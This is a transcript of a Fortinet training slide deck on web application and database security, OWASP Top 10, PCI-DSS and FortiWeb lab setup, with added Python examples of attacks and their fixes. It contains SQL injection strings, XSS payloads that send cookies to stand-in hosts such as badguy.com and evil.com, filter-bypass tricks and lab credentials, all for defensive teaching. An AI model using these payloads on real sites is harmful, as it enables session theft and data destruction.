latam mx fortiweb fortidb training-v1.1

Upload: guns-dc

Post on 14-Apr-2018

TRANSCRIPT

  • 7/27/2019 LATAM MX Fortiweb FortiDB Training-V1.1

    1/362

    LATAM SE TEAM

    FortiWeb and FortiDB

    Training

2/362

1 Introduction to Web Application Security

2 Database Vulnerabilities & Misconfigurations

3 OWASP Top 10 and PCI-DSS

4 Lab Installation and Setup

5 Introduction to FortiWeb

6 How to PoC FortiWeb

7 FortiWeb Basic & Advanced Troubleshooting

7 Introduction to FortiDB

8 How to PoC FortiDB

9 FortiDB Basic & Advanced Troubleshooting

AGENDA

3/362

Introduction to Web Applications

4/362

(Diagram: the Internet)

What are Web Applications?

5/362

What are Web Applications?

Web applications are public, internet-facing applications, accessed using a standard browser. They provide webmail, online retail sales, online auctions, wikis and many other functions, and they are the major e-commerce and business-driving tools of organizations.

Web apps are written for efficient delivery of content. In most cases they are not developed with security in mind, which leaves them open to exploitation and to potential exposure of sensitive information. Attacks range from simple defacement to identity theft and theft of credit card numbers and other PII.

(Diagram: web server data center, with database servers, front-end web servers and the data center perimeter)

6/362

Web Applications Advantages

A standard web browser acts as the application client

7/362

Creates a virtual hyperspace beyond geographical constraints

Breaks computer hardware and software obstacles

Brings the whole world together

A low-cost way to share, maintain, and distribute information: intranet, electronic commerce, customer support

Web Applications Advantages

8/362

Client (front end):

Presents an interface to the user

Gathers information from the user, submits it to a server, then receives, formats, and presents the results returned from the server

The user needs specific software to access data on the server (and a specific operating system, etc.)

The client connects to the server using specific ports

So, what are Client / Server Applications?

9/362

Server (back end): a database from which a client requests information

Fulfills a request for information by managing the request or serving the requested information to the client

Responsible for data storage and management

Only authorized users can retrieve data from the server (firewall policies, access control, etc.)

So, what are Client / Server Applications?

10/362

Adversaries have fewer obstacles when performing an attack.

An infrastructure attack presents all of the obstacles shown in the slide's diagram; a web application attack presents fewer obstacles and elements, because the application has to be reachable by design: HTTP is allowed through every perimeter and the attacker's requests look like any other client's.

Why are those differences important?

11/362

HTTP is a networking protocol, the foundation of the World Wide Web.

HTTP functions as a request/response protocol.

HTTP/1.1 defines eight request methods, plus PATCH added later (RFC 5789); GET and POST are by far the most widely used.

GET method: requests a representation of the specified resource. Data is included in the requested URL:

GET http://www.xbank.com/get.html?uid=xxx HTTP/1.1

POST method: submits data to be processed to the identified resource. Data is included in the message body, not in the URL:

POST /login.php HTTP/1.1
Host: www.xbank.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 29

username=User1&password=pass1

Neither placement protects the data by itself: without TLS both the URL and the body travel in clear text, and query-string parameters are additionally written to browser history and to web server and proxy logs, which is why credentials must never be sent with GET.

Some Web Application Concepts

12/362

HTML documents are usually static, but web applications need dynamic documents: search results, database access, context-sensitive replies.

Client-side / server-side execution:

Server-side: the action occurs at the server. The server runs a set of instructions and returns values to the browser.

Client-side: the action occurs on the client side (browser). The instructions are executed on the user's computer.

Some Web Application Concepts

13/362

Client-side scripts are embedded inside the HTML document and interpreted by the browser.

When the web browser encounters a script, it calls a scripting interpreter, which parses and deciphers the scripting code.

They provide responses to questions and queries without intervention from the server: validate user data, calculate expressions, link to other applications.

Client-side validation is a usability feature only: an attacker sends requests directly, bypassing the browser, so every check must be repeated on the server.

Client Side Scripting

14/362

Goal: render and present content to the user

Software: browsers (IE, Safari, Firefox, etc.)

Language: HTML/JavaScript, etc.

Client Side / Application Layer

15/362

Allows creation of dynamic web pages: modifies the HTML code on the server before it is sent to the client

Uses databases such as Access and Oracle

Responds to user input

Server Side Scripting

16/362

Goal: receive user requests, validate and process them, and convert them into database requests

Software: web servers (Apache/IIS), application servers (Tomcat, WebSphere)

Language: Java/ASP/PHP

Server Side / Application Layer

17/362

Goal: store and manage access to data

Software: DBMS (Oracle, MS SQL Server, MySQL, etc.)

Language: SQL

Database / Data Layer

18/362

Input that requires validation: HTTP parameters, HTTP headers, database/filesystem input, configuration

Output that requires encoding: HTML / CSS / JavaScript / XML / images

Common Web Application Problems

19/362

Web Application Security

20/362

Are your Web Applications Secure?

21/362

Injection attacks trick an application into including unintended commands in the data sent to an interpreter.

Interpreters interpret strings as commands. Examples: SQL, LDAP, XPath.

Key idea: input data from the application is executed as code by the interpreter.

SQL Injections

22/362

1. App sends form to user

2. Attacker submits the form with SQL exploit data

3. Application builds a query string with the exploit data

4. Application sends the SQL query to the DB

5. DB executes the query, including the exploit, and sends data back to the application

6. Application returns the data to the user

(Diagram: attacker and user on one side of the firewall, web server and DB server on the other; the form's password field carries ' or 1=1--. The firewall does not help: the injected query arrives on the same port 80 as legitimate traffic.)

SQL Injections

23/362

Unauthorized Access Attempt:

password = ' or 1=1 --

SQL statement becomes:

select count(*) from users where username = 'user' and password = '' or 1=1 --'

Because AND binds tighter than OR, the WHERE clause evaluates to (username = 'user' and password = '') or 1=1, which is always true, permitting access. The trailing -- comments out the closing quote the application appended.

SQL Injection Attack # 1

24/362

Database Modification Attack:

password = foo'; delete from users where username like '%

DB executes two SQL statements:

select count(*) from users where username = 'user' and password = 'foo';
delete from users where username like '%'

This only works where the database driver executes stacked statements in one call (MS SQL Server batches do; many other driver/database combinations run only the first statement), but the root cause, untrusted input spliced into the SQL text, is the same as in attack # 1.

SQL Injection Attack # 2
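The two attacks above, run end to end against an in-memory SQLite database. This is an added example, not code from the training deck: the users table, the sample rows and the driver behaviour (Python's sqlite3, whose execute() refuses stacked statements while executescript() runs them, standing in for a database that accepts batches) are assumptions of the example, and safe_login shows the parameterized query that closes the hole.

```python
import sqlite3

# Constructed sample data for this example (not from the training deck).
USERS = [("user", "s3cret"), ("alice", "hunter2"), ("bob", "letmein")]


def make_db():
    """In-memory stand-in for the application's users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("create table users (username text, password text)")
    conn.executemany("insert into users values (?, ?)", USERS)
    conn.commit()
    return conn


def build_query(username, password):
    """The vulnerable application's string concatenation: untrusted input
    is spliced straight into the SQL text."""
    return ("select count(*) from users where username = '" + username
            + "' and password = '" + password + "'")


def vulnerable_login(conn, username, password):
    """Attack #1 path: one statement, built by concatenation."""
    return conn.execute(build_query(username, password)).fetchone()[0] > 0


def vulnerable_login_batch(conn, username, password):
    """Attack #2 path: same concatenation, but the driver runs every statement
    in the string (executescript), as a database that accepts batches would.
    Returns the SQL text that was actually executed."""
    script = build_query(username, password)
    conn.executescript(script)
    return script


def safe_login(conn, username, password):
    """Parameterized query: the SQL text is fixed and the values travel
    separately, so quotes and comment markers in the input stay data."""
    row = conn.execute(
        "select count(*) from users where username = ? and password = ?",
        (username, password),
    ).fetchone()
    return row[0] > 0


def user_count(conn):
    return conn.execute("select count(*) from users").fetchone()[0]


def demo():
    """Runs both attacks from the slides and returns the observable results."""
    conn = make_db()
    results = {}

    # Attack #1: the password field carries  ' or 1=1 --
    bypass = "' or 1=1 --"
    results["vuln_bypass"] = vulnerable_login(conn, "user", bypass)  # True
    results["safe_bypass"] = safe_login(conn, "user", bypass)        # False
    results["safe_real"] = safe_login(conn, "user", "s3cret")        # True

    # Attack #2: the password field carries a stacked DELETE
    wipe = "foo'; delete from users where username like '%"
    results["sql_run"] = vulnerable_login_batch(conn, "user", wipe)
    results["rows_after_wipe"] = user_count(conn)                    # 0
    return results


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The parameterized version needs no escaping logic of its own: the same ' or 1=1 -- string is compared, as a whole, against the password column and simply does not match.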

25/362

Exploits of a Mom (the xkcd "Little Bobby Tables" comic: a pupil named Robert'); DROP TABLE Students;-- wipes the school's database)

26/362

Cross Site Scripting (XSS) is a type of exploit where information from one context, where it is not trusted, can be inserted into another context, where it is trusted.

The trusted website is used to store, transport, or deliver malicious content to the victim.

The target is to trick the client browser into executing malicious scripting commands: JavaScript, VBScript, ActiveX, HTML, or Flash.

Caused by insufficient input validation and, above all, missing output encoding.

Cross Site Scripting

27/362

Steal cookies: hijack the user's session, unauthorized access

Modify the content of the web page: insert words or images, misinform, damage reputation

Spy on what you do

Network mapping

XSS viruses (worms)

Cross Site Scripting can

28/362

1. Attacker sends an e-mail with <script> tags embedded in the link.

2. Victim follows the link and the script executes:

http://mybank.com/account.php?variable=<script>document.location='http://www.badguy.com/cgi-bin/cookie.cgi?'+document.cookie</script>

www.badguy.com runs the cookie collector (cookie.cgi).

Malicious content does not get stored on the server. The server bounces the original input back to the victim without modification.

Cross Site Scripting - Reflected

29/362

1. Attacker uploads malicious scripting commands to the public forum web site.

2. Victim browses the forum.

3. Victim downloads the malicious code along with the page:

Great message!
<script>var img=new Image();img.src="http://www.bad.com/CookieStealer/Form1.aspx?s="+document.cookie;</script>

The server stores the malicious content and serves it in its original form to every visitor.

Cross Site Scripting - Persistent

30/362

Cross-site request forgery, also known as a one-click attack or session riding, is a type of malicious exploit of a website whereby unauthorized commands are transmitted from a user that the website trusts.

Unlike cross-site scripting (XSS), which exploits the trust a user has for a particular site, CSRF exploits the trust that a site has in a user's browser: the browser attaches the session cookie to every request to that site, whichever page generated the request.

Cross Site Request Forgery

31/362

    Cross Site Request Forgery

32/362

    Cross Site Request Forgery
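The CSRF slides above explain the trust relationship in words; the following added example (not part of the deck) simulates a bank transfer handler with and without a synchronizer token. The session store, the account names, the server key and the forged form are all constructed for the example. The point it shows: the cookie proves who the browser is, only the token proves the request came from the bank's own page.

```python
import hashlib
import hmac
import secrets

# Constructed state for this example: server-side secret, logged-in sessions
# (cookie value -> user) and account balances. Names are assumptions.
SERVER_KEY = secrets.token_bytes(32)
SESSIONS = {"sid-hsimpson": "hsimpson"}
BALANCES = {}


def reset_balances():
    BALANCES.clear()
    BALANCES.update({"hsimpson": 1000, "bob": 0, "attacker": 0})


def csrf_token(session_id):
    """Synchronizer token bound to the session with an HMAC. The server embeds
    it in its own transfer form; a page on another origin can neither compute
    it (no key) nor read it (same-origin policy)."""
    return hmac.new(SERVER_KEY, session_id.encode(), hashlib.sha256).hexdigest()


def do_transfer(user, to, amount):
    if to not in BALANCES or amount <= 0 or BALANCES[user] < amount:
        return "400 bad transfer"
    BALANCES[user] -= amount
    BALANCES[to] += amount
    return "200 ok"


def transfer_unprotected(cookies, form):
    """Trusts the browser: any request carrying a valid session cookie is
    executed, no matter which page generated it."""
    user = SESSIONS.get(cookies.get("session"))
    if user is None:
        return "401 not logged in"
    return do_transfer(user, form["to"], int(form["amount"]))


def transfer_protected(cookies, form):
    """Same handler plus the token check, compared in constant time."""
    sid = cookies.get("session")
    user = SESSIONS.get(sid)
    if user is None:
        return "401 not logged in"
    if not hmac.compare_digest(form.get("csrf", ""), csrf_token(sid)):
        return "403 missing or invalid CSRF token"
    return do_transfer(user, form["to"], int(form["amount"]))


def demo():
    """Victim is logged in; an attacker's page auto-submits a transfer form
    to the bank, and the browser attaches the victim's cookie to it."""
    reset_balances()
    victim_cookies = {"session": "sid-hsimpson"}
    forged_form = {"to": "attacker", "amount": "500"}        # built by evil site
    legit_form = {"to": "bob", "amount": "100",
                  "csrf": csrf_token("sid-hsimpson")}        # from the bank's page
    results = {
        "forged_unprotected": transfer_unprotected(victim_cookies, forged_form),
        "forged_protected": transfer_protected(victim_cookies, forged_form),
        "legit_protected": transfer_protected(victim_cookies, legit_form),
        "no_cookie": transfer_protected({}, forged_form),
    }
    results["victim_balance"] = BALANCES["hsimpson"]
    results["attacker_balance"] = BALANCES["attacker"]
    return results


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The forged request succeeds against the unprotected handler (the attacker ends up with 500) and is rejected with 403 by the protected one, while the bank's own form, which carries the token, still works.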

33/362

Samy Kamkar's JavaScript worm from 2005. Payload: adds "but most of all, Samy is my hero" to the viewer's profile and copies itself there.

Exponential growth:

7 hours, ~200 infected

12 hours, ~10K infected

17 hours, >1M infected

MySpace shuts down

Case Study: MySpace Samy Worm

34/362

Encoded JavaScript inside a CSS style attribute of an allowed tag; the blacklisted word "javascript" was disguised by splitting it as "java" + newline + "script", which the browser still accepts.

Bypassed the innerHTML filter using eval('document.body.inne' + 'rHTML')

Case Study: MySpace Samy Worm

35/362

MySpace implemented a blacklist:

Blacklisted many tags, but not <a>, <img> and <div>, and some others. So: put the script in a div's style attribute.

Blacklisted the word "javascript". So: "java" + newline + "script".

Blacklisted "innerHTML" (document.body.innerHTML gives the page source, which the worm needed to copy itself). So: alert(eval('document.body.inne' + 'rHTML'))

Blacklists fail because the attacker only needs one encoding or spelling the filter author did not think of; output encoding and allow-lists do not share that weakness.

Case Study: MySpace Samy Worm
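The reflected and persistent XSS slides and the Samy case study above all turn on the same two points: a page that concatenates untrusted text into HTML, and a blacklist that tries to catch the bad strings. The following added example (not code from the deck) renders the deck's own payloads through a vulnerable page and through an output-encoded page, and runs a MySpace-style blacklist against a Samy-style payload to show the bypass. The page template, the blacklist words and the crude "would the browser run this" check are assumptions of the example.

```python
import html
import re
from urllib.parse import quote

# Payloads from the reflected and persistent XSS slides in this deck.
REFLECTED_PAYLOAD = (
    "<script>document.location='http://www.badguy.com/cgi-bin/cookie.cgi?'"
    "+document.cookie</script>"
)
PERSISTENT_PAYLOAD = (
    '<script>var img=new Image();img.src='
    '"http://www.bad.com/CookieStealer/Form1.aspx?s="+document.cookie;</script>'
)
# Samy-style payload (constructed): the script hides in a style attribute of an
# allowed tag; the blacklisted words are broken up by a newline and a join.
SAMY_STYLE_PAYLOAD = (
    "<div style=\"background:url('java\nscript:"
    "eval(document.body.inne' + 'rHTML)')\">hello</div>"
)

WRAPPER_OPEN = "<div class='message'>"


def phishing_link(base, payload):
    """Step 1 of the reflected attack: the payload is URL-encoded into a link."""
    return base + "?variable=" + quote(payload, safe="")


def render_unsafe(user_input):
    """The vulnerable page: whatever came in (query parameter or stored forum
    post) is concatenated into the HTML unchanged."""
    return WRAPPER_OPEN + user_input + "</div>"


def encode(user_input):
    """Output encoding: <, >, &, \" and ' become entities, so the browser
    renders the text instead of parsing it as markup."""
    return html.escape(user_input, quote=True)


def render_encoded(user_input):
    return WRAPPER_OPEN + encode(user_input) + "</div>"


def browser_would_run_script(page):
    """Crude stand-in for the HTML parser: does the user-controlled part of
    the page open a script tag or any other live element?"""
    body = page[len(WRAPPER_OPEN):]
    return re.search(r"<(script|div|img|a)\b", body, re.IGNORECASE) is not None


# MySpace-style blacklist from the case study: forbidden substrings.
BLACKLIST = ("<script", "javascript", "innerhtml")


def blacklist_allows(user_input):
    """True when the filter lets the input through."""
    lowered = user_input.lower()
    return not any(bad in lowered for bad in BLACKLIST)


def demo():
    return {
        "link": phishing_link("http://mybank.com/account.php", REFLECTED_PAYLOAD),
        "unsafe_runs_script": browser_would_run_script(render_unsafe(PERSISTENT_PAYLOAD)),
        "encoded_runs_script": browser_would_run_script(render_encoded(PERSISTENT_PAYLOAD)),
        "blacklist_stops_obvious": not blacklist_allows(PERSISTENT_PAYLOAD),
        "blacklist_stops_samy": not blacklist_allows(SAMY_STYLE_PAYLOAD),
        "encoding_stops_samy": not browser_would_run_script(render_encoded(SAMY_STYLE_PAYLOAD)),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The blacklist catches the obvious <script> post and misses the Samy-style one; encoding at output time neutralizes both, because it does not need to know what the attacker wrote.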

36/362

DATA: 64% of 10M security incidents had port 80 as entry point

Some Reflections

37/362

Database Vulnerabilities and Misconfigurations

38/362

What about the Database?

39/362

RSA: proprietary information about RSA's SecurID authentication tokens (2011)

Sony PlayStation Network customers: more than 100 million customer account details and 12 million unencrypted credit card numbers (2011)

HBGary Federal: 60,000 confidential emails, executive social media accounts, and customer information (2011)

Epsilon: e-mail databases from 2 percent of the firm's 2,500 corporate clients (2011)

June 7, 2011: RSA Faces Angry Users After Breach. The nation's biggest banks and large technology companies like SAP rushed Tuesday to accept RSA Security's offer to replace their ubiquitous SecurID tokens as many computer security experts voiced frustration with the company.

Tue Apr 26, 2011: Sony suffered a massive breach in its video game online network that led to the theft of names, addresses and possibly credit card data belonging to 77 million user accounts in what is one of the largest-ever Internet security break-ins.

2011-03-01: The embattled CEO of HBGary Federal has resigned his post three weeks after Anonymous hacked into the company's network and stole thousands of e-mail messages.

April 02, 2011: Major Breach at Epsilon, the World's Largest Permission Based Email Marketing Services Company, Affects Wide Range of Major Brands - List Continues to Grow

Database Heist

http://www.reuters.com/news/video
40/362

Common DB Vulnerabilities / Misconfigurations

Default, blank, and weak username/password

Removing default, blank and weak log-in credentials is an important first step for filling chinks in your database armor.

The bad guys keep track of default accounts, and they'll use them when they can.

41/362

Common DB Vulnerabilities / Misconfigurations

Extensive user and group privileges

Privileges should not be granted directly to users, who will eventually collect them like janitors collect keys on their keychains.

Make users part of groups or roles and administer the rights through those roles, which can be managed collectively more easily than if users were assigned direct rights.

42/362

Common DB Vulnerabilities / Misconfigurations

Unnecessarily enabled database features

A database installation comes with add-on packages of all shapes and sizes that are mostly going to go unused by any one organization.

Database security is about reducing attack surface. Disable or uninstall those unused packages.

43/362

Common DB Vulnerabilities / Misconfigurations

Broken configuration management

Databases have many different configuration choices and considerations available to DBAs to fine-tune performance and enhance functionality.

Unsafe configurations could be enabled by default or turned on for the convenience of DBAs or application developers.

44/362

Common DB Vulnerabilities / Misconfigurations

Denial of Service / Buffer overflows

Buffer overflows are exploited by feeding an input far more data than the application was written to expect (like sending 100 characters to an input box asking for an SSN); the excess overwrites adjacent memory and, in the worst case, control flow.

Database vendors have worked hard to fix the flaws that allow these attacks to occur (that's why patching is so critical).

45/362

Vertical / government regulation(s) and their high-level requirements for databases:

Finance - GLBA, Basel II: activity monitoring/audit of customer records and account information residing in databases

Healthcare - HIPAA: monitoring/auditing access to patient data residing in databases

Pharma - 21 CFR Part 11: monitoring/auditing access to drug research data in databases

States - CA law 1386: monitoring/auditing access to PID (personally identifiable data) residing in databases (for privacy of personal information)

Federal - FISMA (NIST 800-53A): assessment and implementation of various IT internal controls for databases

Cross-industry regulation and high-level requirements for databases:

PCI: PID data access monitoring in databases

SOX: auditing financial database transactions to ensure integrity of financial statements

Regulatory Environment

46/362

Securing Confidential Data: Social Security, credit card and revenue numbers, all held in databases and applications (ERP, CRM, SCM, custom applications)

Automation of Auditing and Compliance: reporting for SOX, PCI and other regulations

Change Control: keep track of all changes related to database structures (DDL) and users (DCL)

Virtualization: support both virtualized and non-virtualized environments

Efficient Deployment and Management: low TCO

DB Activity Monitoring Requirements

47/362

OWASP Top 10 2010

48/362

1. Injection

2. Cross site scripting (XSS)

3. Broken authentication and session management

4. Insecure direct object reference

5. Cross site request forgery (CSRF)

6. Security misconfiguration

7. Insecure cryptographic storage

8. Failure to restrict URL access

9. Insufficient transport layer protection

10. Unvalidated redirects and forwards

OWASP Top 10 - 2010

49/362

(Diagram: client, application, and the interpreters the application drives: DB, shell, program/CPU. Each one is an injection target.)

A1 - Injections

50/362

String query = "SELECT * FROM accnts WHERE ID='" + request.getParameter("id") + "'";

With id="foo" the query is what the developer expected:

SELECT * FROM accnts WHERE ID='foo';

With id="foo';DROP TABLE accnts;--" the parameter closes the string literal and appends a second statement; the comment marker swallows the closing quote the code appended:

SELECT * FROM accnts WHERE ID='foo';DROP TABLE accnts;--';

A1 - Injections

51/362

(Diagram: attacker's browser and victim's browser both talk to the same application and DB; the application relays the attacker's input to the victim)

A2 Cross Site Scripting

52/362

(String) page += "<input name='creditcard' type='TEXT' value=\"" + request.getParameter("CC") + "\">";

With CC=123456789" the value closes the attribute early; with

CC=123456789"><script>window.location='http://evil.com?x='+document.cookie</script>

the attacker's script lands in the page as markup and ships the victim's cookie to evil.com.

A2 Cross Site Scripting

53/362

Unpredictable passwords, session IDs and security questions

No session IDs or credentials in the URL

Avoid session fixation: issue a new session ID on login

Session timeouts and logout buttons

Different session IDs outside/inside TLS

No clear-text passwords

A3 Broken Authentication

54/362

A report is fetched by a direct reference, period=2011q2 (the diagram also shows 2010q1 and 2011q2 reports). Changing the parameter to period=2011q3 returns an object the application never checked the user was authorized to see.

A4 Insecure Direct Object Reference

A5 Cross Site Request Forgery

55/362

56/362

Patching: OS, application, frameworks / libraries

Disable unnecessary services

Stack traces, configuration

A6 Security Misconfigurations

57/362

Keep track of sensitive data

Passwords one-way hashed and salted

Password/key management: TLS key passphrase, M2M passwords (obfuscation)

A7 Insecure Cryptographic Storage

58/362

/user/getAccounts

/admin/getAccounts

An attacker who knows or guesses the admin URL simply requests it: hiding a link is not access control, and every request must be authorized on the server.

A8 Failure to restrict URL access

59/362

Use SSL/TLS for the whole session, not only for the login

No mixed content; use secure cookies (the Secure flag keeps the session cookie off plain HTTP connections)

Example: Firesheep (2010) exploited exactly this poor practice, sniffing session cookies of sites that protected only the login page and hijacking the sessions from a shared Wi-Fi network.

A9 Insufficient Transport Layer Protection

60/362

http://www.vuln.com/redir.asp?=http://www.links.com

http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D (percent-encoded www.google.com: an encoded target defeats naive string checks for "http://" or a domain name unless the value is decoded before it is checked)

A10 Unvalidated Redirects and Forwards
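A redirect validator for the A10 case above, as an added example that is not part of the deck. It decodes the parameter before judging it (so the percent-encoded google.com in the slide is caught), accepts only site-relative paths or absolute URLs to the site's own hosts, and rejects scheme-relative, backslash and userinfo tricks. The allowed host set and the test vectors are assumptions constructed for the example.

```python
from urllib.parse import unquote, urlsplit

# Assumption for this example: the hosts that count as "our site".
ALLOWED_HOSTS = {"www.vuln.com"}


def safe_redirect_target(target, default="/"):
    """Return `target` only if it stays on our site; otherwise `default`.
    Decodes first so that %-encoded hosts (the slide's second URL) are judged
    by what the browser will actually see."""
    if not target:
        return default
    decoded = unquote(target)
    # CR/LF or other control characters in a Location value = header injection
    if any(ord(ch) < 0x20 or ch == "\x7f" for ch in decoded):
        return default
    parts = urlsplit(decoded)
    if parts.scheme or parts.netloc:
        # absolute or scheme-relative (//host) URL: only our own hosts, http(s);
        # hostname is parsed after any user@ part, so www.vuln.com@evil.com fails
        if parts.scheme in ("http", "https") and parts.hostname in ALLOWED_HOSTS:
            return decoded
        return default
    # site-relative path: exactly one leading slash (// and /\ are scheme-relative
    # in browsers)
    if decoded.startswith("/") and not decoded.startswith(("//", "/\\")):
        return decoded
    return default


# Constructed test vectors: attacker-controlled redirect parameter values and
# the target the validator should produce for each.
CASES = {
    "http://www.links.com": "/",
    "http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D": "/",
    "//evil.com/login": "/",
    "/\\evil.com": "/",
    "javascript:alert(document.cookie)": "/",
    "http://www.vuln.com@evil.com/": "/",
    "/account%0d%0aSet-Cookie:%20x=1": "/",
    "http://www.vuln.com/account": "http://www.vuln.com/account",
    "/account/list": "/account/list",
    "": "/",
}


def check_all():
    return {target: safe_redirect_target(target) for target in CASES}


if __name__ == "__main__":
    for target, result in check_all().items():
        print(f"{target!r:60} -> {result}")
```

Where the application only ever needs to send users to a handful of internal pages, an allow-list of named destinations (redirect to a key, not a URL) removes the parsing problem entirely.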

61/362

PCI-DSS Application Security Requirements

Web Application Security and PCI

62/362

Requirement 6: develop and maintain secure systems and applications

Patching

Configuration

Development lifecycle

Testing

Production

Web Application Security and PCI

63/362

Develop software applications based on industry best practices and incorporate information security throughout the software development life cycle.

6.3.1 Testing of all security patches

6.3.2 Separate development, test, and production environments

6.3.3 Separation of duties between development, test, and production

6.3.4 Live PANs are not used for testing or development

6.3.5 Removal of test data and accounts before production

6.3.6 Removal of custom application accounts, usernames, and passwords

6.3.7 Review of custom code prior to release to production or customers

Sub-requirement 6.3

64/362

Develop all web applications based on secure coding guidelines such as the Open Web Application Security Project (OWASP) guidelines. Review custom application code to identify coding vulnerabilities.

6.5.1 Unvalidated input

6.5.2 Broken access control (for example, malicious use of user IDs)

6.5.3 Broken authentication and session management (use of account credentials and session cookies)

6.5.4 Cross-site scripting (XSS) attacks

6.5.5 Buffer overflows

6.5.6 Injection flaws (for example, structured query language (SQL) injection)

6.5.7 Improper error handling

6.5.8 Insecure storage

6.5.9 Denial of service

6.5.10 Insecure configuration management

Sub-requirement 6.5

65/362

Ensure that all web-facing applications are protected against known attacks by applying either of the following methods:

Having all custom application code reviewed for common vulnerabilities by an organization that specializes in application security

Installing an application-layer firewall in front of web-facing applications

Sub-requirement 6.6

66/362

"Application firewall" in requirement 6.6 means a web application firewall (WAF), not a general-purpose application-layer firewall.

What makes a WAF acceptable for PCI?

Meets all applicable PCI DSS requirements

Reacts appropriately to threats

Inspects web application input and responds

Prevents data leakage

Enforces both positive and negative security models

Inspects Hypertext Markup Language (HTML), Dynamic HTML (DHTML), and Cascading Style Sheets (CSS)

Sub-requirement 6.6 - Clarifications

67/362

    Initial Lab Configuration

    Lab Topology

68/362

VMnet1 (host-only network)

Host machine: 2.2.2.1/24

VM Database & FortiDB: IP 2.2.2.20/24, Windows XP; local login Administrator / fortidb1!$; FortiDB login admin / fortidb1!$

VM Web Server: IP 2.2.2.21/24, Ubuntu 10; login xuser / xuser

FortiWeb: IP 2.2.2.15/24, FortiWeb-VM; login admin / (blank password)

    Preparing the VM Environment

69/362

From the USBs provided by Fortinet, download the compressed VMs FWB_VM64bit, HTTP_Server and DB_Server, and the FortiDB installer FDB_X86.

You will need: VMware Workstation 7/8/9, 4096 MB RAM, 20 GB hard disk, hyper-threading enabled.

    Customize VMWare Environment

70/362

Edit Network Interfaces: VMnet1 (host-only), 2.2.2.0/24

    Virtual Machines Connections

71/362

Go to VM > Settings, edit Network Adapter (1) and point it to VMnet1.

Set the IP addresses as shown in the diagram for the Windows DB server, the Ubuntu HTTP server, FortiWeb and the host machine.

    FortiWeb Initial Configuration

72/362

Press the Enter key once to get a new prompt, and log in using the default FortiWeb-VM administrator name, admin. There is no password for the administrator; press Enter when prompted.

Use the CLI to configure the IP address of a virtual interface (port1):

config system interface
    edit port1
        set ip 2.2.2.15/24
end

Set a password for admin before the management interface is reachable by anyone else; an administrator account with a blank password is itself a finding in any assessment.

    Lab Flows

73/362

One-arm HTTP proxy topology: gives us enough flexibility for our labs.

Flow 1: send traffic through the FortiWeb.

Host machine: 2.2.2.1/24

VM Database & FortiDB: IP 2.2.2.20/24, Windows XP; Administrator / fortidb1!$; FortiDB 4.2.1, admin / fortidb1!$

VM Web Server: IP 2.2.2.21/24, Ubuntu 10; xuser / xuser

FortiWeb: IP 2.2.2.15/24, FortiWeb-VM build0414; admin / (blank password)

    Lab Flows

74/362

This flat network deployment is not recommended in a production environment, since a client can easily bypass FortiWeb by addressing the web server directly.

One-arm HTTP proxy topology: gives us enough flexibility for our labs.

Flow 2: send traffic straight to the web server.

Host machine: 2.2.2.1/24

VM Database & FortiDB: IP 2.2.2.20/24, Windows XP; Administrator / fortidb1!$; FortiDB 4.2.1, admin / fortidb1!$

VM Web Server: IP 2.2.2.21/24, Ubuntu 10; xuser / xuser

FortiWeb: IP 2.2.2.15/24, FortiWeb-VM build0414; admin / (blank password)

    Xbank Online Banking Application

75/362

Web application: PHP/Apache

Database: MS SQL Server

Login URL: http://2.2.2.21/xbank/index.html

Login: hsimpson, password: 1234

    Xbank Navigation Flow

76/362

index.html: redirects to index.php?p=login.html

index.php: frameset

login.html: login page

topFrame.html: top frame

bottomFrame.html: bottom frame

verify_admin.php: authenticates the customer

list_accounts.php: lists the customer's associated accounts

list_cards.php: lists the customer's associated cards

show_profile.php: shows customer information

show_transaction.php: shows transfer information

save_profile.php: saves changed customer information

list_activity.php: lists account activity

save_transaction.php: makes a transfer

    Xbank Database Diagram

77/362

XBANK_CUSTOMER: customer_id, customer_login, customer_password, customer_fname, customer_lname, customer_email, customer_address, customer_since

XBANK_ACCOUNT: account_id, account_number, account_type, account_balance, account_currency, customer_id, branch_id

XBANK_ACCOUNT_CARD: account_id, card_id

XBANK_ACTIVITY: activity_id, account_id, activity_timestamp, activity_type, activity_amount, activity_status

XBANK_BRANCH: branch_id, branch_name, branch_address

XBANK_CARD: card_id, card_number, card_type, card_cvd, card_expiration

Note that XBANK_CARD stores card_cvd: PCI DSS forbids storing the card verification code after authorization, so this column is a finding in its own right, independent of any injection flaw.

    FortiWeb Servers Configuration

78/362

Physical Server: the real HTTP server (real IP address)

Virtual Server: represents the HTTP server as it is seen by external network devices (similar to a virtual IP)

Protected Server: represents all IP addresses, hostnames, or FQDNs that might come in the Host field of the HTTP header

    FortiWeb Servers Configuration

79/362

A note about Protected Servers!

It is important in multi-homed scenarios (same virtual IP, same physical IP): protected hosts allow different policies to be defined for different sites.

Be careful with NATed environments: when the site is accessed by IP address, the Host field value won't be the same as the virtual IP address, so a request that matches no protected host falls through to the default action.

    Physical Server Setup

80/362

1. Create a new Physical Server object

2. Unique object name

3. Physical IP address

    Virtual Server Setup

81/362

1. Create a new Virtual Server object

2. Unique object name

3. Virtual IP address

4. Listening interface

    Protected Servers Setup

82/362

1. Define Protected Servers

2. Unique object name

3. Default Action = Deny

4. Click OK to save

5. After saving, click Create New

    Protected Servers Setup (2)

83/362

1. Hostname used by the client

2. Accept HTTP traffic with this hostname

3. Click OK to save

    Protected Servers Setup (3)

84/362

    Final Results


    Create a Web Policy

85/362

1. Select Server Policy

2. Click Create New to create a new Server Policy

    Create a Web Policy (2)

86/362

Policies are the glue that joins Physical Servers, Virtual Servers, Protected Hosts and Protection Profiles: what are we protecting, and how.

1. Complete your policy as defined in the left image

2. Leave the other fields at their defaults

3. Click OK to save

    Checking the Configuration

87/362

1. Enter the virtual IP and URL path to test the HTTP proxy settings

    Checking the Configuration

88/362

1. After accessing the XBANK application, check your ARP table:

Windows: run arp -a in a command window

Linux/Mac: run arp -an in a terminal

2. Note the MAC addresses for the IP address of your FortiWeb and your virtual IP. Are they the same? Why? (In one-arm mode the virtual IP is answered by FortiWeb's own interface, so both addresses resolve to the same MAC.)

    Access using FQDN

89/362

1. Add an entry to your hosts table so that www.xbank.com resolves to 2.2.2.50 (virtual IP):

